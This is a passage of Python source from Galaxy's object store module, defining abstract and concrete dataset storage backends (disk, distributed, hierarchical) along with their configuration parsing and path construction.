from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = (
"Attempted to 'create' object store entity in configuration with no database session present."
)
log = logging.getLogger(__name__)
class ObjectStore(metaclass=abc.ABCMeta):
"""ObjectStore interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
@abc.abstractmethod
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
@abc.abstractmethod
def create(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
@abc.abstractmethod
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
@abc.abstractmethod
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
@abc.abstractmethod
def delete(
self,
obj,
entire_dir=False,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_data(
self,
obj,
start=0,
count=-1,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
@abc.abstractmethod
def get_filename(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
@abc.abstractmethod
def update_from_file(
self,
obj,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
file_name=None,
create=False,
):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct access if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_concrete_store_name(self, obj):
"""Return a display name or title of the objectstore corresponding to obj.
To accommodate nested objectstores, obj is passed in so this metadata can
be returned for the ConcreteObjectStore corresponding to the object.
If the dataset is in a new or discarded state and an object_store_id has not
yet been set, this may return ``None``.
"""
@abc.abstractmethod
def get_concrete_store_description_markdown(self, obj):
"""Return a longer description of how data 'obj' is stored.
To accommodate nested objectstores, obj is passed in so this metadata can
be returned for the ConcreteObjectStore corresponding to the object.
If the dataset is in a new or discarded state and an object_store_id has not
yet been set, this may return ``None``.
"""
@abc.abstractmethod
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@abc.abstractmethod
def get_store_by(self, obj):
"""Return how object is stored (by 'uuid', 'id', or None if not yet saved).
Certain Galaxy remote data features aren't available if objects are stored by 'id'.
"""
raise NotImplementedError()
class BaseObjectStore(ObjectStore):
store_by: str
store_type: str
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
extra_dirs = {}
extra_dirs["job_work"] = config.jobs_directory
extra_dirs["temp"] = config.new_file_path
extra_dirs.update({e["type"]: e["path"] for e in config_dict.get("extra_dirs", [])})
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def file_ready(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
"config": config_to_dict(self.config),
"extra_dirs": extra_dirs,
"type": self.store_type,
}
def _get_object_id(self, obj):
if hasattr(obj, self.store_by):
obj_id = getattr(obj, self.store_by)
if obj_id is None:
obj.flush()
return obj.id
return obj_id
else:
# job's don't have uuids, so always use ID in this case when creating
# job working directories.
return obj.id
def _invoke(self, delegate, obj=None, **kwargs):
return self.__getattribute__(f"_{delegate}")(obj=obj, **kwargs)
def exists(self, obj, **kwargs):
return self._invoke("exists", obj, **kwargs)
def create(self, obj, **kwargs):
return self._invoke("create", obj, **kwargs)
def empty(self, obj, **kwargs):
return self._invoke("empty", obj, **kwargs)
def size(self, obj, **kwargs):
return self._invoke("size", obj, **kwargs)
def delete(self, obj, **kwargs):
return self._invoke("delete", obj, **kwargs)
def get_data(self, obj, **kwargs):
return self._invoke("get_data", obj, **kwargs)
def get_filename(self, obj, **kwargs):
return self._invoke("get_filename", obj, **kwargs)
def update_from_file(self, obj, **kwargs):
return self._invoke("update_from_file", obj, **kwargs)
def get_object_url(self, obj, **kwargs):
return self._invoke("get_object_url", obj, **kwargs)
def get_concrete_store_name(self, obj):
return self._invoke("get_concrete_store_name", obj)
def get_concrete_store_description_markdown(self, obj):
return self._invoke("get_concrete_store_description_markdown", obj)
def get_store_usage_percent(self):
return self._invoke("get_store_usage_percent")
def get_store_by(self, obj, **kwargs):
return self._invoke("get_store_by", obj, **kwargs)
class ConcreteObjectStore(BaseObjectStore):
"""Subclass of ObjectStore for stores that don't delegate (non-nested).
Currently only adds store_by functionality. Which doesn't make
sense for the delegating object stores.
"""
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
super().__init__(config=config, config_dict=config_dict, **kwargs)
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
self.name = config_dict.get("name", None)
self.description = config_dict.get("description", None)
def to_dict(self):
rval = super().to_dict()
rval["store_by"] = self.store_by
rval["name"] = self.name
rval["description"] = self.description
return rval
def _get_concrete_store_name(self, obj):
return self.name
def _get_concrete_store_description_markdown(self, obj):
return self.description
def _get_store_by(self, obj):
return self.store_by
class DiskObjectStore(ConcreteObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = "disk"
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super().__init__(config, config_dict)
self.file_path = os.path.abspath(config_dict.get("files_dir") or config.file_path)
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
store_by = config_xml.attrib.get("store_by", None)
if store_by is not None:
config_dict["store_by"] = store_by
name = config_xml.attrib.get("name", None)
if name is not None:
config_dict["name"] = name
for e in config_xml:
if e.tag == "files_dir":
config_dict["files_dir"] = e.get("path")
elif e.tag == "description":
config_dict["description"] = e.text
else:
extra_dirs.append({"type": e.get("type"), "path": e.get("path")})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super().to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def __get_filename(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(
obj,
base_dir=base_dir,
dir_only=dir_only,
extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root,
alt_name=alt_name,
obj_dir=False,
old_style=True,
)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(
obj,
base_dir=base_dir,
dir_only=dir_only,
extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root,
alt_name=alt_name,
)
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(
self,
obj,
old_style=False,
base_dir=None,
dir_only=False,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
**kwargs,
):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning("extra_dir is not normalized: %s", extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning("alt_name would locate path outside dir: %s", alt_name)
raise ObjectInvalid("The requested object is invalid")
obj_id = self._get_object_id(obj)
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
assert (
obj_id is not None
), f"The effective dataset identifier consumed by object store [{self.store_by}] must be set before a path can be constructed."
path = os.path.join(path, alt_name if alt_name else f"dataset_{obj_id}.dat")
return os.path.abspath(path)
def _exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def _create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self._exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get("dir_only", False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, "w").close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def _empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def _size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self._exists(obj, **kwargs):
try:
filepath = self._get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self._get_filename(obj, **kwargs)
extra_dir = kwargs.get("extra_dir", None)
obj_dir = kwargs.get("obj_dir", False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self._exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical(f"{self.__get_filename(obj, **kwargs)} delete error {ex}")
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self._get_filename(obj, **kwargs)) # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
path = self._construct_path(obj, **kwargs)
if not os.path.exists(path):
raise ObjectNotFound
return path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop("preserve_symlinks", False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self._create(obj, **kwargs)
if file_name and self._exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self._get_filename(obj, **kwargs))
else:
path = self._get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except shutil.SameFileError:
# That's ok, we need to ignore this so that remote object stores can update
# the remote object from the cache file path
pass
except OSError as ex:
log.critical(f"Error copying {file_name} to {self.__get_filename(obj, **kwargs)}: {ex}")
raise ex
def _get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def _get_store_usage_percent(self, **kwargs):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(BaseObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super().__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super().shutdown()
def _exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method("_exists", obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method("file_ready", obj, False, False, **kwargs)
def _create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def _empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method("_empty", obj, True, False, **kwargs)
def _size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method("_size", obj, 0, False, **kwargs)
def _delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method("_delete", obj, False, False, **kwargs)
def _get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method("_get_data", obj, ObjectNotFound, True, **kwargs)
def _get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method("_get_filename", obj, ObjectNotFound, True, **kwargs)
def _update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get("create", False):
self._create(obj, **kwargs)
kwargs["create"] = False
return self._call_method("_update_from_file", obj, ObjectNotFound, True, **kwargs)
def _get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method("_get_object_url", obj, None, False, **kwargs)
def _get_concrete_store_name(self, obj):
return self._call_method("_get_concrete_store_name", obj, None, False)
def _get_concrete_store_description_markdown(self, obj):
return self._call_method("_get_concrete_store_description_markdown", obj, None, False)
def _get_store_by(self, obj):
return self._call_method("_get_store_by", obj, None, False)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return f"{obj.__class__.__name__}({self.store_by}={obj_id})"
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
"""Check all children object stores for the first one with the dataset."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default(
"objectstore, _call_method failed: %s on %s, kwargs: %s"
% (method, self._repr_object_for_exception(obj), str(kwargs))
)
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = "distributed"
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super().__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
self.search_for_missing = config_dict.get("search_for_missing", True)
random.seed()
for backend_def in config_dict["backends"]:
backened_id = backend_def["id"]
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
backend = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends[backened_id] = backend
self.max_percent_full[backened_id] = maxpctfull
for _ in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backened_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor, args=[self.sleeper])
self.filesystem_monitor_thread.daemon = True
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find("backends")
backends: List[Dict[str, Any]] = []
config_dict = {
"search_for_missing": asbool(backends_root.get("search_for_missing", True)),
"global_max_percent_full": float(backends_root.get("maxpctfull", 0)),
"backends": backends,
}
for b in [e for e in backends_root if e.tag == "backend"]:
store_id = b.get("id")
store_weight = int(b.get("weight", 1))
store_maxpctfull = float(b.get("maxpctfull", 0))
store_type = b.get("type", "disk")
store_by = b.get("store_by", None)
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["id"] = store_id
backend_config_dict["weight"] = store_weight
backend_config_dict["max_percent_full"] = store_maxpctfull
backend_config_dict["type"] = store_type
if store_by is not None:
backend_config_dict["store_by"] = store_by
backends.append(backend_config_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, (
"distributed object store ('object_store = distributed') "
"requires a config file, please set one in "
"'distributed_object_store_config_file')"
)
log.debug("Loading backends for distributed object store from %s", distributed_config)
config_xml = parse_xml(distributed_config).getroot()
legacy = True
else:
log.debug("Loading backends for distributed object store from %s", config_xml.get("id"))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self) -> Dict[str, Any]:
as_dict = super().to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
as_dict["search_for_missing"] = self.search_for_missing
backends: List[Dict[str, Any]] = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super().shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self, sleeper: Sleeper):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
sleeper.sleep(120) # Test free space every 2 minutes
def _create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self._exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid(
"objectstore.create, could not generate "
"obj.object_store_id: %s, kwargs: %s" % (str(obj), str(kwargs))
)
log.debug(
"Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
else:
log.debug(
"Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default(
"objectstore, _call_method failed: %s on %s, kwargs: %s"
% (method, self._repr_object_for_exception(obj), str(kwargs))
)
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning(
"The backend object store ID (%s) for %s object with ID %s is invalid"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
elif self.search_for_missing:
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning(
f"{obj.__class__.__name__} object with ID {obj.id} found in backend object store with ID {id}"
)
obj.object_store_id = id
return id
return None
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = "hierarchical"
def __init__(self, config, config_dict, fsmon=False):
"""The default constructor. Extends `NestedObjectStore`."""
super().__init__(config, config_dict)
backends: Dict[int, ObjectStore] = {}
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for backend in sorted(config_xml.find("backends"), key=lambda b: int(b.get("order"))):
store_type = backend.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(backend)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super().to_dict()
backends = []
for backend in self.backends.values():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def _exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def _create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class: Type[ObjectStore]
objectstore_constructor_kwds = {}
if store == "disk":
objectstore_class = DiskObjectStore
elif store == "s3":
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == "cloud":
from .cloud import Cloud
objectstore_class = Cloud
elif store == "swift":
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == "distributed":
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == "hierarchical":
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == "irods":
from .irods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == "azure_blob":
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == "pithos":
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
else:
raise Exception(f"Unrecognized object store definition: {store}")
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = "xml"
if config is None and config_dict is not None and "config" in config_dict:
# Build a config object from to_dict of an ObjectStore.
config = Bunch(**config_dict["config"])
elif config is None:
raise Exception(
"build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict"
)
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = parse_xml(config.object_store_config_file).getroot()
store = config_xml.get("type")
else:
with open(config_file) as f:
config_dict = yaml.safe_load(f)
from_object = "dict"
store = config_dict.get("type")
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get("type")
elif config_dict is not None:
from_object = "dict"
store = config_dict.get("type")
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if from_object == "xml":
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get("base_dir", None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == "DiskObjectStore":
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception(
"Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?" % func.__name__
)
return wraps
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = f"{terabytes:.2f}TB"
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = f"{gigabytes:.2f}GB"
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = f"{megabytes:.2f}MB"
elif bytes >= 1024:
kilobytes = bytes / 1024
size = f"{kilobytes:.2f}KB"
else:
size = f"{bytes:.2f}b"
return size
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses."""
return {
